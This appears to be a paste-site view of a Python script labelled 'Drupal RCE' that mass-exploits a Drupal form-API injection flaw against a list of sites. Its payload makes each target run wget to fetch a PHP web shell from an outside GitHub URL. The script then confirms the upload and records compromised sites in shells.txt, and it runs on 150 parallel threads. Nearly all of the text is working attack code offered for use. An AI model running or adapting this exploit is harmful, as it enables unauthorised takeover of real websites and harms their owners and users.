SHOW:
|
|
- or go back to the newest paste.
| 1 | #!/usr/bin/env | |
| 2 | import sys | |
| 3 | import requests | |
| 4 | from multiprocessing.dummy import Pool | |
| 5 | import time | |
| 6 | ||
| 7 | ||
| 8 | ||
| 9 | ||
| 10 | ||
| 11 | try: | |
| 12 | target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()] | |
| 13 | except IndexError: | |
| 14 | - | exit('Usage: m3.exe list.txt')
|
| 14 | + | exit('Usage: m3.py list.txt')
|
| 15 | def progressbar(it, prefix = "", size = 1000): | |
| 16 | count = len(it) | |
| 17 | def _show(_i): | |
| 18 | x = int(size*_i/count) | |
| 19 | sys.stdout.write("%s[%s%s] %i/%i\r" % (prefix, "#"*x, "_"*(size-x), _i, count))
| |
| 20 | sys.stdout.flush() | |
| 21 | _show(0) | |
| 22 | for i, item in enumerate(it): | |
| 23 | yield item | |
| 24 | _show(i+1) | |
| 25 | sys.stdout.write("\n")
| |
| 26 | sys.stdout.flush() | |
| 27 | toolbar_width = 30 | |
| 28 | ||
| 29 | sys.stdout.write(":%s:" % (" " * toolbar_width))
| |
| 30 | sys.stdout.flush() | |
| 31 | sys.stdout.write("\b" * (toolbar_width+1))
| |
| 32 | ||
| 33 | for i in xrange(toolbar_width): | |
| 34 | time.sleep(0.01) | |
| 35 | ||
| 36 | sys.stdout.write("*")
| |
| 37 | sys.stdout.flush() | |
| 38 | ||
| 39 | sys.stdout.write("\n")
| |
| 40 | def slowprint(s): | |
| 41 | ||
| 42 | for c in s + '\n': | |
| 43 | ||
| 44 | sys.stdout.write(c) | |
| 45 | ||
| 46 | sys.stdout.flush() # defeat buffering | |
| 47 | ||
| 48 | time.sleep(60/90) | |
| 49 | print("------------------------------------------------------------------------")
| |
| 50 | slowprint ("[-] Drupal RCE ")
| |
| 51 | slowprint (" https://www.facebook.com/Remah.go.id/")
| |
| 52 | ||
| 53 | payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php'}
| |
| 54 | headers = {'User-Agent': 'Mozilla 5.0'}
| |
| 55 | ||
| 56 | def run(u): | |
| 57 | try: | |
| 58 | url = u + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' | |
| 59 | r = requests.post(url, data=payload, verify=False, headers=headers) | |
| 60 | if 'Select Your File :' in requests.get(u+'/payload.php', verify=False, headers=headers).text: | |
| 61 | print ('Uploaded Here:', u + '/payload.php')
| |
| 62 | with open('shells.txt', mode='a') as d:
| |
| 63 | d.write(u + '/payload.php\n') | |
| 64 | else: | |
| 65 | print(u, " -> Can't Exploit") | |
| 66 | except: | |
| 67 | pass | |
| 68 | ||
| 69 | mp = Pool(150) | |
| 70 | mp.map(run, target) | |
| 71 | mp.close() | |
| 72 | mp.join() |
